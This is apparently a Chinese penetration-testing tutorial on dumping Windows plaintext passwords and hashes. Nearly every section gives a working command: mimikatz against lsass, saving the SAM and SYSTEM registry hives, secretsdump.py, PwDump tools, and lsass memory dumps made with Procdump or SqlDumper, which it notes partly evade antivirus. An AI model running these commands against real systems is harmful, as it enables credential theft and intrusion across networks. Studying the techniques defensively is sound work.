渗透测试,可用于测试企业单位内网的安全性,而获取Windows的明文或Hash往往是整个渗透测试过程中重要的一环,一旦某台机器的密码在内网中是通用的,那么该内网的安全性将会非常糟糕。
本期安仔课堂,ISEC实验室的李老师为大家介绍一些抓取Windows明文或Hash的方式。
一、mimikatz
mimikatz是一款轻量级的调试神器,功能非常强大,其中最常用的功能就是抓取明文或Hash。
用法:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
图1另外,需要注意的是,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
图2修改注册表命令:
图3修改成功后,等用户下次再登录的时候,重新运行mimikatz,即可抓到明文密码,如需恢复原样,只需将上图REG_DWORD的值1改为0即可。
图4二、Getpass
Getapss是由闪电小子根据mimikatz编译的一个工具,可以直接获取明文密码,直接运行Getpass.exe即可。
图5三、Wce
Wce是一款Hash注入神器,不仅可以用于Hash注入,也可以直接获取明文或Hash。
抓明文:wce.exe -w
图6抓Hash:wce.exe -l
图7四、 Powershell
当目标系统存在powershell时,可直接一句powershell代码调用抓取,前提是目标可出外网,否则需要将ps1脚本放置内网之中。
抓明文:
图8
图9抓Hash:
图10
图11五、 Sam
1.使用注册表来离线导出Hash
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息。
图12或者导入sam.hiv和system.hiv的syskey获取密码Hash。
图13除了cain,也可以使用mimikatz加载sam.hiv和sam.hiv来导出Hash。
用法:mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit
图14或者使用impacket 套件中的 secretsdump.py 脚本去解密,也是可以的。
用法:python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL
图152.使用mimikatz在线导出sam的Hash
用法:mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
图16六、PwDump7
Pwdump7可以在CMD下直接提取系统中用户的密码Hash,直接运行即可。
图17七、 Quarks PwDump
Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取Windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。
用法:
导出本地用户Hash:
Quarks PwDump.exe --dump-hash-local
图18配合Ntdsutil导出域用户Hash:
QuarksPwDump –dump-hash-domain –ntds-file c:\ntds_save.dit
图19八、 Procdump + mimikatz
Procdump 是微软出品的一个小工具,具备一定的免杀功能。
用法:
1.生成dump文件
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
图202.mimikatz加载dump文件
mimikatz.exe"sekurlsa::minidumplsass.dmp""sekurlsa::logonPasswords full" "exit"
图21九、SqlDumper + mimikatz
SqlDumper.exe是从SQL Server安装目录下提取出来的,功能和Procdump相似,并且也是微软出品的,体积远小于Procdump,也具备一定的免杀功能。SqlDumper.exe默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本,参考如下:
140 for SQL Server 2017
130 for SQL Server 2016
120 for SQL Server 2014
110 for SQL Server 2012
100 for SQL Server 2008
90 for SQL Server 2005
如果目标机器没有安装SQL Server,可以自己上传一个SqlDumper.exe。
用法:
1.查看lsass.exe 的ProcessID
tasklist /svc |findstr lsass.exe
图222.导出dump文件
Sqldumper.exe ProcessID 0 0x01100
图233.mimikatz加载dump文件
mimikatz.exe"sekurlsa::minidumpSQLDmpr0001.mdmp""sekurlsa::logonPasswords full""exit"
图24成功导出明文或Hash破解后,一旦密码通用,将会威胁整个内网。因此,内网管理人员应尽量避免使用通用密码,并及时安装防护软件。
